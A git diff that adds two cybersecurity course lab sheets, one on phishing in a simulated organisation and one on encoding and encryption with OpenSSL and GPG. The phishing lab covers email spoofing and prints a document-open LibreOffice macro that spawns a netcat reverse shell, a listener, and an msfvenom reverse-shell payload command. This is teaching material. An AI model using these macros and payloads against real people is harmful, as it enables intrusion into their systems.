diff --git a/_labs/cyber_security_landscape/3_phishing.md b/_labs/cyber_security_landscape/3_phishing.md new file mode 100644 index 0000000..ae8d8a8 --- /dev/null +++ b/_labs/cyber_security_landscape/3_phishing.md @@ -0,0 +1,341 @@ +--- +title: "Human Factors and Social Engineering: Phishing" +author: ["Z. Cliffe Schreuders", "Tom Shaw"] +license: "CC BY-SA 4.0" +description: "Learn about human factors in cybersecurity through hands-on phishing simulation. Practice social engineering techniques, email spoofing, and creating malicious attachments to understand how attackers exploit human psychology." +overview: | + Humans play a crucial role in the cyber security of systems and information. Many attacks target users and their mental models of cyber security systems and risk. For example, if an attacker can trick a user into performing tasks for them, the attacker can achieve their goals and gain access that they are not authorised to. Human behavior often serves as both the first line of defense and the weakest link. This lab delves into the critical role humans play in safeguarding systems and information. It highlights the fact that even the most robust technical defenses can be compromised due to human error and deception. This lab primarily focuses on a pervasive cyber threat - phishing attacks. Phishing, an artful manipulation of human psychology, lures individuals into compromising security by tricking them into revealing sensitive information, clicking malicious links, or installing malware. Through this hands-on exercise, you will gain insights into how attackers exploit human vulnerabilities, learn the tactics used to craft convincing phishing emails, and explore techniques to create malicious attachments that can compromise a user's system. + + In this lab, you will embark on a simulated cybersecurity mission within a fictitious organization. Your objective is to browse the organization's website to gather information on employees, email addresses, and their potential interests. You will then employ the tactics of engagement by sending targeted phishing emails to these individuals, using techniques such as spoofing emails, creating malicious attachments (executable programs, LibreOffice documents with macros), and more. As your victims respond to your emails, they will reveal why they trust or distrust your messages, providing invaluable feedback. The ultimate goal is to persuade these users to open the malicious attachments, granting you remote access to their systems. Your mission culminates in accessing the coveted "flag" files hidden in each victim's home directory, which you will submit as proof of your success. This lab offers a unique opportunity to understand how cybersecurity threats exploit human psychology, providing a practical foundation to enhance cyber awareness and strengthen defenses against these deceptive tactics. +tags: ["phishing", "social-engineering", "email-security", "human-factors", "malware", "macros"] +categories: ["cyber_security_landscape"] +lab_sheet_url: "https://docs.google.com/document/d/1Yb28GYRLD0Ihnb5oeFp-TGurhb8BZfm_qFbSSrGEknI/edit?usp=sharing" +type: ["ctf-lab", "lab-sheet"] +difficulty: "easy" +cybok: + - ka: "HF" + topic: "Human Error" + keywords: ["latent usability failures in systems-of-systems"] + - ka: "AB" + topic: "Attacks" + keywords: ["SOCIAL ENGINEERING", "MALICIOUS ACTIVITIES BY MALICIOUS ATTACHMENTS"] + - ka: "MAT" + topic: "Attacks and exploitation" + keywords: ["EXPLOITATION FRAMEWORKS", "MALCODE/MALWARE - SOCIAL ENGINEERING - BAITING", "MALCODE/MALWARE - SOCIAL ENGINEERING - PRETEXTING", "MALCODE/MALWARE - VIRUSES - MACRO VIRUSES", "MALCODE/MALWARE - SPAM", "MALCODE/MALWARE - SPOOFING"] + - ka: "WAM" + topic: "Client-Side Vulnerabilities and Mitigations" + keywords: ["E-MAIL - PHISHING", "E-MAIL - SPOOFING"] +--- + +# Introduction to Human Behaviour and Cyber Security + +Humans play a crucial role in the cyber security of systems and information. Many attacks target users and their mental models of cyber security systems and risk. For example, if an attacker can trick a user into performing tasks for them, the attacker can achieve their goals and gain access that they are not authorised to. + +It is often said that “the user is the weakest link in security”, because **human error** can have as much impact as a technical vulnerability, and it is often possible regardless of how strong technical defences are. + +As a consequence, cyber security awareness training is an important part of an organisation’s cyber security programme. It is also important that the security that is put in place needs to be usable/understandable and acceptable to users. + +## Introduction to Phishing {#introduction-to-phishing} + +One way that users are attacked is through phishing emails. A phishing email attack is an email that tricks the user into performing actions such as revealing sensitive information, clicking links that trigger technical web attacks, or installing malware. This lab focuses on the latter, malicious code sent via email. If an employee opens a malicious attachment, such as a document with macros or an executable program, then an attacker can take direct control of that user’s computer. + +## Preparation {#preparation} + +Access the challenge via Hacktivity. + +We have automated most of the setup required for the lab, except you need to setup Thunderbird email client manually, and disable the proxy for Firefox. + +==VM: On Kali Linux== + +==action: Login with user: kali, password: kali==. + +==action: Start by opening Thunderbird (Applications → Usual Applications → Internet → Thunderbird)==. + +![][image-2] + +Thunderbird may take a minute to start. + +==action: Enter these details:== + +* Full name: Guest +* Email address: guest@accountingnow.com +* Password: guestpassword + +![][image-3] + +![][image-4] + +==action: Click "Continue" and "Done"==. + +> Warning: **If prompted** with a warning, accept the lack of encryption between the server and the client: + +![][image-5] + +==action: "I understand the risks", "Confirm" and "Confirm security exception"==. + +> Note: In real life, you should not use email that has no encryption between the server and client. We will explore email security further in a future topic. + +![][image-6] + +==action: Click "Confirm Security Exception"==. + +==action: Click "Finish"==. + +==action: Open Firefox (Applications → Usual Applications → Internet → Firefox)==. + +Firefox may take a minute to start. + +==action: Disable the proxy in Firefox (Menu → Preferences)==: + +![][image-7] + +==action: Scroll down to the bottom of the page: Network Settings → "Settings"== + +![][image-8] + +![][image-9] + +==action: "No proxy"== + +==action: Click "OK."== + +## The aim and tasks in this lab {#the-aim-and-tasks-in-this-lab} + +This lab provides a simulated organisation scenario, where you will: + +* Browse the organisation’s website to identify employees, email addresses, potential friendships and interests. +* Send emails to them to trick them into running attachments, by crafting a convincing email by including keywords, names, spoofed email addresses, and content. +* Send them malicious attachments: executable programs, libreoffice documents. +* When you get the victims to open these attachments, you can gain remote access to their s\`stem, and get a flag for each user you trick this way. + +The aim is to get access to the “flag” file from each victim’s home directory, which contains flags for you to submit to Hacktivity. + +## Reconnaissance: browse the website {#reconnaissance:-browse-the-website} + +==VM: From within your VM==, ==action: Browse to our target organisation: http://accountingnow.com== (this is a fictional organisation that exists in your VM, don't visit the actual Internet site with this URL\!) + +![][image-10] + +==action: Look through all the pages on this website and document all the employee's names and email addresses that you can find==. + +## Engagement: send phishing emails {#engagement:-send-phishing-emails} + +==action: From your list of email addresses, try sending an email to one of them from within Thunderbird: click "Write"==. + +![][image-11] + +==action: Type a message and click "Send"==. + +==action: Check your email to see what reply you get (Click "Get Messages", wait and check again if you don't have a reply yet)==. The reply may look something like the following: + +``` +I'm not accepting this email because: + +* I don't trust the sender + +* The message doesn't include the sender's name + +* It's not addressed to me + +* It's unrelated to me + +---------- + +Hello there! +``` + +In this simulation your victims will reply and tell you why they are not choosing to trust the email (unlike in real life\!). Once they trust your email they won't reply, they will instead open any attachments they trust. + +> Hint: Each victim will only open certain types of attachments, or none at all. + +> Flag: Each victim has a flag file in their home directory, containing the flag you need to access to succeed at the challenge. + +> Tip: You can write a similar email by viewing your sent folder, and right click → "Edit As New Message". + +# Hint: Spoofing emails {#hint-spoofing-emails} + +You can change the email address that the email is sent "from" – without knowing any passwords for the accounts. This is due to a fundamental security issue in the way emails are authenticated. Not all outgoing email servers require authentication that matches the email address on the email. There are protections in place that means that emails that are sent from untrusted email servers may not be accepted; however, further discussion is outside the scope of this exercise. + +==action: To change your sender email address, click the drop-down selector next to your From address, and click "Customize From Address"==. + +![][image-12] + +> Note: In this simulation you will still receive reply messages, unlike real life where replies would be sent to the spoofed email address. + +# Hint: Creating malicious attachments {#hint-creating-malicious-attachments} + +> Hint: The types of malicious attachments that you should try sending includes: + +* Executable programs +* LibreOffice Writer (word processor .odt files) with Macros +* LibreOffice Calc (spreadsheet .ods files) with Macros + +> Hint: Think about the kinds of jobs people have and which kinds of documents they are most likely to receive and open – for example, is someone working in finance most likely to accept a program or a spreadsheet? + +> Tip: If you want an additional challenge, skip these hints, and send your own payloads of choice. + +## Hint: creating malicious macros that execute when the document is opened {#hint-creating-malicious-macros-that-execute-when-the-document-is-opened} + +Office documents, such as Microsoft Word or Excel, or LibreOffice Writer or Calc, can have macros saved within them. Macros are programming scripts (often written in a Visual Basic based programming language) that can be used to automate calculations and modifications to documents, but can also access external resources and execute operating system commands. + +Due to the damage they can do, in recent years by default a document with Macros will warn the user against running untrusted macros. However, in this scenario we are dealing with users who say "ok" to everything. + +> Tip: If you want an additional challenge, skip this hint, and send your own payload of choice. + +==action: You can create a document with a macro:== + +==action: Open LibreOffice Writer (Applications → Usual Applications → Office → LibreOffice Writer)==. + +==action: Click menu Tools → Macros → Organise Macros → Basic…== + +==action: Click Untitled 1 (or the name of the current file)== + +==action: Click "New"== + +==action: Name the macro anything, such as "macro"== + +==action: Enter the source code for your Macro==. Here is an example of a macro that runs a shell command (in this case creating a file "thisisatest" in the current working directory of the program: + +```vb +Sub Main + Shell("/bin/touch", vbNormalFocus, "thisisatest") +End Sub +``` + +==action: After you have entered some code, to get the macro to run when the document is opened:== + +==action: Minimise the Macro code window==. + +==action: Click the document's menu Tools → Customise → Events (tab)== + +==action: Select "Open Document"== + +==action: Click "Macro…"== + +> Tip: If you cannot see your macro, you may have opened the 'Customise' pane via the Macro window's toolbar rather than the Document window's toolbar. + +==action: Expand the "+" next to Untitled 1, Standard, macro, and select the Main on the right==. + +![][image-13] + +==action: Type some content into your document and save it as an .odt file==. + +Now when you open the document up it will try to execute it (if your victim's macro security settings are set low, and they agree to run it). + +==action: Try open the document that you just created locally on the Kali VM in LibreOffice Writer==. + +![][image-14] + +You will see a warning at the top of the page suggesting that the macro will not run. This is due to the fact the Kali VM has a restrictive macro security setting, but this is not always the case. + +==action: In order to simulate the attack locally you should downgrade your macro security settings:== + +==action: Click the document's Tools → Options== + +==action: Select LibreOffice → Security from the side panel, then click Macro Security…== + +![][image-15] + +==action: Change the Security Level to Low== + +It is worth noting that the Medium level requires confirmation from the user, but still allows them to run macros if they accept the risks. When the user accepts the warning, macros will execute. + +Some word processors are configured this way by default and it is common for less technically proficient end-users to click through security warnings without understanding the consequences. + +==action: You can create a macro that creates a simple reverse shell using nc:== + +```vb +Sub Main + Shell("/bin/nc", vbNormalFocus, "-e /bin/sh ==edit:KALI_IP_ADDRESS== 8080") +End Sub +``` + +Where ==edit:KALI_IP_ADDRESS== is the IP address reported from: + +```bash +hostname -I +``` + +==action: On Kali, start listening for connections, before the document is opened:== + +```bash +nc -lvvp 8080 +``` + +When your victim opens the document, the reverse shell will be triggered connecting back to your Kali system. If you have started the listener, you will be greeted with shell access to the victim. + +> Tip: It can take a minute or two for LibreOffice to launch on the victim, so be patient. + +## Hint: creating malicious executable programs (malware payload) {#hint:-creating-malicious-executable-programs-(malware-payload)} + +==VM: On Kali== ==action: start a netcat listener, and leave this running; your victim will connect back to this:== + +```bash +nc -lvvp 4444 +``` + +Where ==edit:KALI_IP_ADDRESS== is the IP address reported from: + +```bash +hostname -I +``` + +==VM: On Kali== ==action: create a reverse tcp payload, by using metasploit:== + +```bash +msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST==edit:KALI_IP_ADDRESS== LPORT=4444 -f elf -o malware +``` + +You can send the malware file as a malicious attachment. When a victim opens it, it will connect back to your Kali system with a connection to run shell commands. + +## Hint: accessing the flag files {#hint:-accessing-the-flag-files} + +> Flag: A flag file can be found in each victim's home directory. Read the flag, by gaining shell access to their system, then running commands. + +Once you have a shell connection to the victim you can start running commands such as: + +==action: List all files, showing details:== + +```bash +ls -la +``` + +==action: Read the contents of a file named flag in the current directory:== + +```bash +cat flag +``` + +> Flag: Submit the flags to Hacktivity! + +## Conclusion {#conclusion} + +At this point you have: + +* Seen how information from public sources, such as websites can inform spear phishing attempts + +* Spoofed emails, and crafted messages to trick users + +* Experienced adversarial phishing behaviours – using macros and executable payloads to attack users + +Well done\! + +Note that these example attacks rely on poor user behaviour rather than vulnerable systems. Hopefully these attacks wouldn’t work against well informed users; however, it helps to illustrate how spear phishing attacks are conducted, and the danger of poor “cyber hygiene”. + +It is important to ensure users are cyber security aware enough not to fall for these kinds of tricks. + +[image-1]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-1.png +[image-2]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-2.png +[image-3]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-3.png +[image-4]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-4.png +[image-5]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-5.png +[image-6]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-6.png +[image-7]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-7.png +[image-8]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-8.png +[image-9]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-9.png +[image-10]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-10.png +[image-11]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-11.png +[image-12]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-12.png +[image-13]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-13.png +[image-14]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-14.png +[image-15]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-15.png diff --git a/_labs/cyber_security_landscape/4_encoding_encryption.md b/_labs/cyber_security_landscape/4_encoding_encryption.md new file mode 100644 index 0000000..977be7c --- /dev/null +++ b/_labs/cyber_security_landscape/4_encoding_encryption.md @@ -0,0 +1,466 @@ +--- +title: "Introduction to Cryptography: Encoding and Encryption" +author: ["Mo Hassan", "Z. Cliffe Schreuders"] +license: "CC BY-SA 4.0" +description: "Learn essential cryptography concepts through hands-on practice with encoding schemes, hash algorithms, OpenSSL, and GPG. Master data encoding, symmetric and asymmetric encryption, and key management." +overview: | + Cryptography is a fundamental aspect of information security, enabling us to secure data from prying eyes and malicious actors. This hands-on lab will equip you with essential knowledge and skills related to encoding schemes, hash algorithms, and the use of tools like OpenSSL and Gnu Privacy Guard (GPG). You'll explore concepts like encoding data into different formats, encrypting and decrypting information, and managing keys. These skills are crucial for anyone interested in the field of cybersecurity, data protection, or simply understanding how secure communication works in the digital age. + + Throughout the lab, you'll learn to encode strings into various formats, including hexadecimal and Base64. You'll experiment with symmetric key encryption using the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES). Additionally, you'll explore public-key cryptography with GPG, creating and managing keys, encrypting and decrypting data, and understanding the importance of key pairs. + + In the home directory of your VM there are a series of encoding and encryption CTF challenges for you to complete, to put your knowledge into practice. +tags: ["cryptography", "encoding", "encryption", "openssl", "gpg", "base64", "aes", "des"] +categories: ["cyber_security_landscape"] +lab_sheet_url: "https://docs.google.com/document/d/1wKm2c7yxhM-9GnAiS_Mgvk_8-H7FKEBeGeMc6H0KlwA/edit?usp=sharing" +type: ["ctf-lab", "hackerbot-lab", "lab-sheet"] +difficulty: "intermediate" +cybok: + - ka: "AC" + topic: "Algorithms, Schemes and Protocols" + keywords: ["Encoding vs Cryptography", "Caesar cipher", "Vigenere cipher", "SYMMETRIC CRYPTOGRAPHY - AES (ADVANCED ENCRYPTION STANDARD)"] + - ka: "F" + topic: "Artifact Analysis" + keywords: ["Encoding and alternative data formats"] + - ka: "WAM" + topic: "Fundamental Concepts and Approaches" + keywords: ["ENCODING", "BASE64"] +--- + + + +## Purpose + +The purpose of this lab is to familiarise students with common encoding schemes, hash algorithms, basic OpenSSL and Gnu Privacy Guard (GPG). + +## Introduction to Encoding and Encryption + +There are lots of different ways of representing information. **Encoding methods** are designed to be reversible and involve transforming data into different formats. In contrast, **encryption** involves transforming data into a format that is only readable with a key or password. + +Encoding and encryption are important concepts, and the ability to identify and apply these are highly relevant skills to develop. In this lab you will familiarise yourself with common encoding methods, and some fundamental and common encryption schemes. + +> Note: You will apply these skills time and time again throughout your academic and working life in IT and cyber security. Digital forensics makes extensive use of encoding/decoding, to make sense of digital artefacts, and this also applies to other cyber security topics. + +## Are you ready to encode some data? + +**Encoding data** involves changing it into a new format using a reversible scheme. Encoding is reversible – data can be encoded into a format then decoded back to the original format. Usually encoding is done using publicly known schemes, and is typically done to make it easier to transfer, store, or use data. Encoding is often applied for compatibility reasons. + +> Tip: You can use `iconv -l` command to list all the known coded character sets ☺. + +In this section you learn how to use Linux Command Line Interface (CLI) to encode/decode using some of those schemes. + +## Character Encoding and ASCII + +For example, the string "hello!" can be represented in ASCII (decimal): +* 104 101 108 108 111 + +ASCII (American Standard Code for Information Interchange) is a character encoding scheme for electronic communication. Character encoding schemes translate text into a format so that they can be stored and transferred electronically. Most modern character encoding schemes, such as Unicode (UTF-8 being the most common) are based on ASCII, and support many more symbols, such as emoji (😃). + +In the above example, we are using a decimal format: base 10, like our typical number system we use in mathematics, using the 10 numbers: 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9. + +## Convert a string to byte and then to hex + +You can use any Linux distribution for this lab, please refer to Hacktivity guide to create your own VM. + +==action: Open Linux CLI and type python3 (to open python3 command prompt) followed by the code below:== + +```python +myString="Valhalla!".encode('utf-8') +myStringInHex=myString.hex() +print(myStringInHex) +# Of course you can use print function directly +print(myString.hex()) +``` + +## Hexadecimal (base 16) and Binary (base 2) + +Likewise "hello!" also translates to "68 65 6c 6c 6f 21" in hex (hexadecimal), and "01101000 01100101 01101100 01101100 01101111 00100001" in binary. + +==action: Run these commands in a Linux shell:== + +```bash +echo hello! | xxd -b +``` + +```bash +echo hello! | xxd +``` + +Hexadecimal (also known simply as "hex") is a base 16 numeral system. That is, the information is represented using the 16 symbols: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e, f. + +Hex is also a common way of displaying "binary data"; that is, non-text data, which is not human readable. For example, pixels in an image are not made up of human readable text (if binary data is translated to ASCII it results in gibberish use of symbols). + +> Note: There are many practical reasons for doing these translations between formats. For example, if we want to store any data to disk (whether text or an image), the storage medium itself records data in a binary format. + +## Base64 + +Another popular encoding method is Base64, which uses the symbols: 0-9, a-Z, A-Z, +, /, and also uses = for padding. Base64 is often used with Web technologies, as a safe way of encoding binary data (and is more efficient than using hex). + +Base-N encoding is simply a representation of sequence octets in a form that allows the use of both upper and lowercase letters but that need not be human readable. In Base-64, a 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used "usually" for padding). The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single character in the base 64 alphabet. Each 6-bit group is used as an index into an array of 64 printable characters. The character referenced by the index is placed in the output string\[RFC4648\] + +![][image-2] +*Figure 1: The Base 64 Alphabet* + +![][image-3] +*Figure 2: Example of base64 encoding (no padding used)* + +![][image-4] +*Figure 3: Example of base64 encoding (with pad "=")* + +==action: Open Linux CLI and type the following commands:== + +```bash +echo "0x14fb9c03d97e" | xxd -r -p | base64 +echo "0x14fb9c03" | xxd -r -p | base64 +``` + +> Note: The output should match the above examples (figures 2 and 3) + +==action: Another basic example of encoding and decoding data using base64:== + +```bash +echo "Valhalla" | base64 +``` + +Output: +``` +VmFsaGFsbGEK +``` + +==action: To decode:== + +```bash +echo "VmFsaGFsbGEK" | base64 -d +``` +``` +Valhalla +``` + +> Tip: Congratulations! you are now an expert in encoding and decoding data ☺ + +## Let's do a bit more + +==action: Still using Linux command prompt:== + +```bash +echo "Valhalla" | xxd -p +``` +``` +56616c68616c6c610a +``` + +```bash +echo "Valhalla" | base64 | xxd -p +``` +``` +566d4673614746736247454b0a +``` + +```bash +echo "566d4673614746736247454b0a" | xxd -r -p | base64 -d +``` +``` +Valhalla +``` + +==action: Try to understand what is going on and use different words/strings...== + +> Hint: Use `man base64` and `man xxd` to understand the command options/switches... + +==action: Let's create a file and name it fruitSalad.txt== + +We'll use iconv command, which is a tool to convert text from one character encoding to another. + +> Tip: You can use `iconv -l` to list known encoding scheme. + +```bash +cat << EOF > fruitSalad.txt +Banana =+ +Orange ?! +Apple &^% +Strawberry $"/ +Appricot ' |Z +$Grapefruit% +==-Graps?() +EOF +``` + +==action: Convert fruitSalad.txt to something else:== + +```bash +iconv -f ASCII fruitSalad.txt -t EBCDIC-CP-GB -o fileEncoded.xyz +``` + +```bash +cat fruitSalad.txt +``` + +==action: To reverse the operation (decode), run this command:== + +```bash +iconv -f EBCDIC-CP-GB fileEncoded.xyz -t ASCII +``` + +> Hint: Use `man iconv` to understand the command options/switches... + +## Introduction to Cryptography and Encryption + +**Cryptography** is the study of secure communication in the presence of third parties, or "the art and science of concealing meaning" (Matt Bishop). The word "cryptography" is from Greek words meaning "secret writing". Cryptography can maintain data security in an insecure environment. Modern crypto employs complex math to achieve this. The emphasis of this lab is on implementation and system security, not the mathematics itself. + +## Simple encryption/decryption using OpenSSL + +OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) network protocols and related cryptography standards required by them. +The openssl program is a command line tool for using the various cryptography functions of OpenSSL's crypto library from the shell. It can be used for: + +* Creation and management of private keys, public keys and parameters + +* Public key cryptographic operations + +* Creation of X.509 certificates, CSRs and CRLs + +* Calculation of Message Digests + +* Encryption and Decryption with Ciphers + +* SSL/TLS Client and Server Tests + +* Handling of S/MIME signed or encrypted mail + +* Time Stamp requests, generation and verification + +==action: To list the cipher commands & algorithms supported by OpenSSL, type the following commands:== + +```bash +openssl list -cipher-commands +``` + +```bash +openssl list -cipher-algorithms +``` + +## Symmetric Key Cryptography + +**Symmetric key cryptosystems** use the same key to encrypt and decrypt. As shown in the figure below, the plaintext data is encrypted using a key to produce ciphertext, and using the same key produces the original plaintext. + +> Note: Which is more secure: AES or DES? + +There are many tools to perform encryption, including OpenSSL. + +> Question: What is the name of the high-impact security vulnerability that was discovered in OpenSSL in 2014? Does this affect the security of symmetric key encryption? + +## Data Encryption Standard (DES) + +Data Encryption Standard (DES) is a block cipher designed by IBM in 1970s and was based on Feistel Cipher. It is a symmetric key algorithm uses key size of 56-bit (keyspace is 256) which is too small to be secure nowadays. + +==action: Create a file and name it coconut.txt either using your preferable text editor or directly from the Linux terminal as per the example below:== + +```bash +cat << EOF > coconut.txt +What 8-letter word can have a letter taken away and it still makes +a word; take another letter away and it still makes a word; +keep on doing that until you have one letter left. What is the word? +EOF +``` + +==action: Now, we'll use DES (symmetric-key) algorithm to encrypt coconut.txt:== + +```bash +openssl enc -e -des-cbc -pbkdf2 -in coconut.txt -out coconut.enc +``` + +> Note: You will be prompt to enter a password (the key) +> Warning: The password will NOT be echoed (printed to the screen) + +The above command will use Data Encryption Standard (DES) cipher with CBC mode to encrypt coconut.txt using a key derived from a password. + +| enc | encoding with ciphers | +| \-des-cbc | des algorithm with cipher block chaining (cbc) mode | +| \-pbkdf2 | password-based key derivation function 2 | +| \-in | input file | +| \-out | output file | + + +==action: To decrypt:== + +```bash +openssl enc -des-cbc -d -in coconut.enc -out getMyFileBack.txt +``` + +> Note: `-d` here for decryption + +> Question: This nicely illustrates the key distribution problem. What is the "key distribution problem"? + +## Advanced Encryption Standard (AES) + +* AES is a 128-bit block (symmetric-key based) cipher with a variable key size of 128, 192 or 256 bits. It uses a mix of encryption/decryption techniques such as substitution, permutation, shifting and xoring (for key generation). + +==action: In this example we'll encrypt coconut.txt using openssl (aes):== + +```bash +openssl enc -e -aes-128-cbc -pbkdf2 -k Hello -in coconut.txt -out coconut-eas-128.enc +``` + +> Note: `-k` here is for a passphrase + +==action: To decrypt:== + +```bash +openssl enc -d -aes-128-cbc -pbkdf2 -in coconut-eas-128.enc -out coconut-decrypted-128.txt +``` + +> Note: You will need to enter the passphrase used ("Hello" as per the above example). + +> Tip: You can use key size of 128-bit or 192-bit or 256-bit (-aes-128-cbc, -aes-192-cbc, -aes-256-cbc) in CBC mode or ECB mode (e.g. -aes-256-ecb). + +## Public Key (AKA Asymmetric) Cryptography + +**Public key (AKA asymmetric) cryptosystems** use separate keys for encryption and decryption. It is safe to tell anyone the encryption key, and only the person holding the decryption key can determine the original message. + +Public keys can be made public: for example, used to encrypt messages intended for only the holder of the private key. + +> Warning: Private keys must be kept secret (as with asymmetric keys): for example, used to decrypt messages. If a private key is known by a third party they can decrypt and modify any previous communications. + +> Question: What are the disadvantages of sharing public keys via insecure channels? + +## Gnu Privacy Guard (GPG) + +GNU Privacy Guard (GnuPG) is an FOSS alternative to Pretty Good Privacy (PGP), following the OpenPGP standard, which provides public key crypto. + +* GPG Manual: http://www.gnupg.org/gph/en/manual.html + +==action: To create a key:== + +```bash +gpg --gen-key +``` + +You'll be prompted to enter a password or passphrase (for your private/secret key), you can leave it blank. However, it is highly recommended to create one. + +==action: Export a public key into file public.key:== + +```bash +gpg --export -a "User Name" > yourname_publicKey.txt +``` + +> Note: The above command will create a file called yourname_publicKey.txt with the ascii representation of the public key for User Name. + +==action: Export a private key:== + +```bash +gpg --export-secret-key -a "User Name" > yourname_privateKey.txt +``` + +> Note: The above command will create a file called yourname_privateKey.txt with the ascii representation of the private key for User Name. + +==action: To list the keys in your public key ring:== + +```bash +gpg --list-key +``` + +==action: To list the keys in your secret key ring:== + +```bash +gpg --list-secret-keys +``` + +==action: To generate a short list of numbers that you can use via an alternative method to verify a public key, use:== + +```bash +gpg --fingerprint > fingerprint +``` + +==action: To encrypt data:== + +```bash +gpg -e -u "Sender User Name" -r "Receiver User Name" file +``` + +The recipient (Receiver User Name) public key should be imported to your key ring first. + +> Note: File here is the plaintext, after the encryption process a ciphertext will be generated as file.gpg within the current working directory, which can be decrypted as per the example below. + +==action: To decrypt data:== + +```bash +gpg -d file.gpg +``` + +==action: To edit/revoke key:== + +```bash +gpg --edit-key Username +``` + +```bash +gpg --gen-revoke Username +``` + +## Using stand alone VM + +You will have generated your public key in step no. 1 + +You can use a stand alone testing environment and create two users on the same machine, exchange the keys and test using the commands below. + +==action: Create two users:== + +```bash +sudo useradd -m -s /bin/bash user1 ; sudo useradd -m -s /bin/bash user2 +``` + +==action: Generate pair of keys for each user and export ONLY public key to a file:== + +```bash +gpg --gen-key +``` + +```bash +gpg --export -a "user1" > user1_publicKey.txt +``` + +> Note: Do the same as above for user2 + +==action: Exchange public keys between user1 and user2:== + +> Note: As user1 import user2 public key (and of course vise versa) + +```bash +gpg --import user2_publicKey.txt +``` + +==action: Create a file (message/plaintext) and encrypt it with user2's public key as per the example in step 7 above.== + +==action: User2 can decrypt the message sent from user1 as per the example in step no. 8== + +## CTF Challenges + +> Flag: We have VMs on Hacktivity containing some challenges related to basic cryptography, mainly encoding, hashing, etc.. + +==action: Log-in to Hacktivity (https://hacktivity.leedsbeckett.ac.uk/hacktivities/53)==. + +==action: Click on Activate and start challenge, then click on Desktop to start the VM, this may take a few minutes==. + +Once the VM is up and running, you should be able to login automatically. + +You will find all of the challenges in the user's home directory (e.g. /home/random_name) and under /srv directory. + +Mainly, there are four directories you need to work on, three under /home/user-name/{encoded, encrypted, secrets} and one under /srv. + +> Tip: Also, CyberChef (a nice and handy tool to explore cryptography) will be loaded automatically, feel free to use it for the CTF challenges or any other tool(s) if you wish. + +> Flag: All of the flags in the form of: flag{astringofrandomwords} – all lowercase, so if the encoding method doesn't support case, you will need to convert yourself. + +> Hint: The string to decimal doesn't separate the values with a space, so you will need to do that part yourself. For example: "97112112108101" would be "apple" but you need to add the separators before CyberChef will translate it: "97 112 112 108 101" + +The zip file in /srv needs sudo to access it, the user's password is "tiaspbiqe2r" (this is a secure password but is quite easy 2 remember). + +```bash +sudo unzip /srv/protected.zip +``` + +> Flag: Good luck! + +[image-1]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-1.png +[image-2]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png +[image-3]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png +[image-4]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png + diff --git a/assets/images/cyber_security_landscape/3_phishing/image-10.png b/assets/images/cyber_security_landscape/3_phishing/image-10.png new file mode 100644 index 0000000..752b0bb Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-10.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-11.png b/assets/images/cyber_security_landscape/3_phishing/image-11.png new file mode 100644 index 0000000..78f1bc6 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-11.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-12.png b/assets/images/cyber_security_landscape/3_phishing/image-12.png new file mode 100644 index 0000000..5ef0878 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-12.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-13.png b/assets/images/cyber_security_landscape/3_phishing/image-13.png new file mode 100644 index 0000000..7f517cc Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-13.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-14.png b/assets/images/cyber_security_landscape/3_phishing/image-14.png new file mode 100644 index 0000000..5ce6259 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-14.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-15.png b/assets/images/cyber_security_landscape/3_phishing/image-15.png new file mode 100644 index 0000000..e573c17 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-15.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-2.png b/assets/images/cyber_security_landscape/3_phishing/image-2.png new file mode 100644 index 0000000..500e91c Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-2.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-3.png b/assets/images/cyber_security_landscape/3_phishing/image-3.png new file mode 100644 index 0000000..fc2ddc6 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-3.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-4.png b/assets/images/cyber_security_landscape/3_phishing/image-4.png new file mode 100644 index 0000000..5b7a657 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-4.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-5.png 